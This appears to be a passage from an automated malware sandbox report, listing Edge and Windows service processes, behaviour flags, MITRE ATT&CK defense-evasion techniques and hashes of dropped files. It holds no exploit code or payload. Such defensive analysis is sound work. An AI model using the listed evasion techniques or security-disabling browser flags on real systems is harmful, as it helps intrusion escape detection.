C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4308 /prefetch:15⤵PID:5088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:15⤵PID:372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:85⤵PID:3048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:2868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:15⤵PID:4904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4364 /prefetch:15⤵PID:2820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4276 /prefetch:15⤵PID:3248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:15⤵PID:4852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2812 /prefetch:15⤵PID:4992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2716 /prefetch:15⤵PID:4840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
PID:4500
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3028
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4988
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Direct Volume Access
1Indicator Removal
2File Deletion
2System Binary Proxy Execution
2Msiexec
1Regsvr32
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD51ca7718b5b10c6ba630df85e692fd924
SHA1a3d54bdea4707d5c680bee16660887c9b187ddbc
SHA25617db8d2c72abd27f6b4d867510a82339cebb119f5c6e7d4b349a7f32a7e1a437
SHA51214882662e975ea8d9c9218d5b505fe529b7d7574bc807db97fa8bd709556a29558ac76f0b1bebc213519d3a7dabe5164d8c31f51a0c63a0c5bf965cb91b0064c
-
Filesize
152B
MD538f59a47b777f2fc52088e96ffb2baaf
SHA1267224482588b41a96d813f6d9e9d924867062db
SHA25613569c5681c71dc42ab57d34879f5a567d7b94afe0e8f6d7c6f6c1314fb0087b
SHA5124657d13e1bb7cdd7e83f5f2562f5598cca12edf839626ae96da43e943b5550fab46a14b9018f1bec90de88cc714f637605531ccda99deb9e537908ddb826113b
-
Filesize
152B
MD5ab8ce148cb7d44f709fb1c460d03e1b0
SHA144d15744015155f3e74580c93317e12d2cc0f859
SHA256014006a90e43ea9a1903b08b843a5aab8ad3823d22e26e5b113fad5f9fa620ff
SHA512f685423b1eaee18a2a06030b4b2977335f62499c0041c142a92f6e6f846c2b9ce54324b6ae94efbbb303282dcda70e2b1597c748fddc251c0b3122a412c2d7c4
-
Filesize
6KB
MD51f937734678c1e4ed1a0a44416382649
SHA19f3130f1d7f10a4f1028c85838b684dbca9c7684
SHA256fa6ba9f5887d3078d307fceaacacfb57989e02b5f6243895ce513f6a03951c9d
SHA51290b3333d3959035e2006909f6c86d115b032422486166a99349a424a60f41207379ea3903ddf28b3352cb48a8619f2d1a8394662aa96a442cfc6332cad8e6dbb
-
Filesize
6KB
MD5db3196bdf80dec0829f2baf56696244c
SHA1e10be2e70274f9bcbd8414cfd29a549e173d9991
SHA25695d6e867e13c2fdccfaca5f0c224403eff5febfc0eeb802119db2f510d6b08db
SHA51242547f9a2ba88040be0009dd5b6d760aa8ef6672aa70314e4569e8abb521a486b0b12f6d7ca73f06ae47115ba651f1e58ae4089030b0054a31950e9f8a57bedd
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD513cd7c509d871d93caa67e1f32c92794
SHA1ba586fcd8f0de965262bd0b2e78b3819b02677b2
SHA2566fc1a579d9d70629f7f80fb490d947acdcce6ccf686075dc33eb30e45a646533
SHA51290a17fc1d76e5003fc8370a96ac2acc73eca2bcfddf2b18c8aed3a79abafbde23355b742881f47bef4b288f6df58951b440488f4066d4ff08b6e865dad38b960
-
Filesize
17KB
MD5d947bcce8097f3daada4c931fad417a6
SHA178135847cb30754ccab58f1161342a6259a63b3f
SHA2564fb1ca4697d538d61ba6de7d05d3f0686492d05c70917d0983cb9a52ec295f8a
SHA51244a67a7a8d6593efd09e17cb6ad1d5c631d13a9df4ec833af9dbd69ebdeb653f7f0aa69adaf3da1a440e8c4d2a58e0c339d75d55da293313329e3966000580d3
-
Filesize
1KB
MD5947919690674ae37064deafb3fa326db
SHA1b79f7f3ad22c9e84546750502f517d16a7618366
SHA256fa4d045e690fbaa4f22fc3827f168e59791e1677ee6c5888a37aa8caf964d801
SHA512c7fcc911acc3084985f07add40a0a41d6628ca567016551196744444e39a562444385647ea5741357bf8bc49695e9cd83cb9d6c45be6f71ef31263b52ba0e32b
-
Filesize
4KB
MD5a756835ce38c068139d8fad26cb47fed
SHA1c1bb3d145188606d07e7b29d86ea6a08586e268d
SHA256d5cfccfe2e3f5ecb566543c74f2972176f61a857234fd33a48325e9459742a78
SHA512d18aa222daf8c3e51e5bf58d2c6ff531b0db92a03f8546efa8add0ac77de4649b1cc73811ad991cc75eb2a9eb22b07ca5d0924569440aba99ce0416527547fac
-
Filesize
56KB
MD591de8a79098ac3d20726e1acb50cd05d
SHA19cb04003c75f0cb63fe0c6dcd22a0c64d63154be
SHA25654f8d71fb3117854743d594aa28427b943e5b2fb46f6003dbf4a9b562ebbfcea
SHA51270cf1fe2c4d9b68c12b30df9013c4a1fd5b5a9fef1de704a42535259d1196b35eca6191270b19dedc4d3699b8211868b6b31a5ae3cccdc24711fb335fc32edc3
-
Filesize
96KB
MD542ad49ed99c0d41a820316309bc2c3b3
SHA1f447a72b3cbea72e1b56fda8f44fd9f304b4474a
SHA25641ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e
SHA5124e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e